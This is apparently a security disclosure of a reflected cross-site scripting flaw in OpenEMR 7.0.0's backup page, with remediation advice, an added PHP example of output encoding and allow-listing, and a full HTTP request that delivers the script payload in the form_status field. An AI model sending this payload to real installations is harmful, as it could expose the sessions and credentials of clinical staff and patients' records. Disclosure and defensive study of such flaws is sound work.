We would like to report a vulnerability we found during software testing. OpenEMR 7.0.0 (the latest version) and earlier, an open-source electronic health records and medical practice management application, has a Reflected Cross-Site Scripting vulnerability in the {form_status} parameter of the backup page that has never been reported before (we checked the official CVE website).
Reflected Cross-Site Scripting (XSS)
> https://<openemrurl>/interface/main/backup.php {form_status}
' /><script>alert(`CVE_Hunting_XSS`)</script>
> /var/www/localhost/htdocs/openemr/interface/main/backup.php (Please see more details in the occurrences section)
This vulnerability allows users to embed arbitrary JavaScript code in the web UI, thus altering the intended functionality and potentially leading to credential disclosure within a trusted session.
Whitelist validation on the server side should be performed for all input fields and parameters in the entire application to ensure that only valid input is processed. The validation should decode any encoded input and then validate the length, characters, format, and any business rules on that data before accepting the input. Special characters such as `'/;&*()%!+{}[]|#, including Carriage Return (ASCII 13, \r, %0d) and Line Feed (ASCII 10, \n, %0a), should be filtered out before the server processes form fields and hidden form fields. In cases where special characters must be allowed in an input field, the application should use a standard function to "escape" them. Alternatively, all parameters returned to the user's browser should be sanitized so that client-side scripting attacks are not effective. Output HTML encoding should be properly implemented to prevent execution of malicious script in the user's browser.
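To make the two recommendations above concrete, here is an added PHP example (not OpenEMR's own code, and the "vulnerable" line is a hypothetical reconstruction of the reflection pattern, not a quote of backup.php). It shows why the report's payload breaks out of a single-quoted attribute when the value is echoed raw, how context-aware output encoding with `ENT_QUOTES` neutralises it, and how an allow-list check rejects the value before it is ever rendered. The `$allowed` set is an assumption for illustration.

```php
<?php
// Added example, not part of the original report or of OpenEMR.
// The payload from the report, used here as constructed input.
$form_status = "' /><script>alert(`CVE_Hunting_XSS`)</script>";

// Hypothetical vulnerable pattern: the request parameter is reflected into a
// single-quoted HTML attribute without any encoding, so a leading apostrophe
// closes the attribute and the rest of the value becomes markup.
function render_status_vulnerable(string $status): string
{
    return "<input type='hidden' name='form_status' value='" . $status . "' />";
}

// Hardened pattern: encode for the HTML attribute context. ENT_QUOTES matters
// because the attribute is single-quoted; PHP's default flags leave the
// apostrophe untouched, which is exactly the character the payload relies on.
function render_status_safe(string $status): string
{
    $encoded = htmlspecialchars($status, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return "<input type='hidden' name='form_status' value='" . $encoded . "' />";
}

// Server-side allow-list validation, as the report recommends: form_status is a
// workflow state, so only the values the page itself emits are accepted.
// Strict comparison avoids PHP's loose type juggling.
function validate_form_status(string $status, array $allowed): ?string
{
    return in_array($status, $allowed, true) ? $status : null;
}

$allowed = ['', 'running', 'complete']; // assumed allow-list for this example

// Raw reflection: the apostrophe terminates the attribute and the <script>
// element lands in the document.
echo render_status_vulnerable($form_status), PHP_EOL;

// Encoded reflection: apostrophe and angle brackets become entities, so the
// browser treats the whole payload as attribute text.
echo render_status_safe($form_status), PHP_EOL;

// Allow-list: the payload is not a known state, so it is rejected (null)
// before any rendering happens.
var_dump(validate_form_status($form_status, $allowed));
```

Output encoding is the control that actually stops reflected XSS; the allow-list is defence in depth, and the two should be combined rather than chosen between. The encoding must match the context the value lands in (attribute, element body, JavaScript string, URL), which is why OpenEMR's own codebase separates helpers such as `attr()` and `text()` rather than relying on a single generic filter.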
POST /interface/main/backup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------134273974110212498243185026588
Content-Length: 626
Origin: https://localhost
Connection: close
Referer: https://localhost/interface/main/backup.php
Cookie: OpenEMR=sDB13cXmxjjPS6d-BF8dtr9D5Kj8PkbOg2oMdxqSKMMo1C7Y
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="csrf_token_form"
4a2e4c79d44d123017f7ff6850e337c8c17557e3
-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="form_backup"
ggwp
-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="form_step"
ggwp
-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="form_status"
' /><script>alert(`CVE_Hunting_XSS`)</script>
-----------------------------134273974110212498243185026588--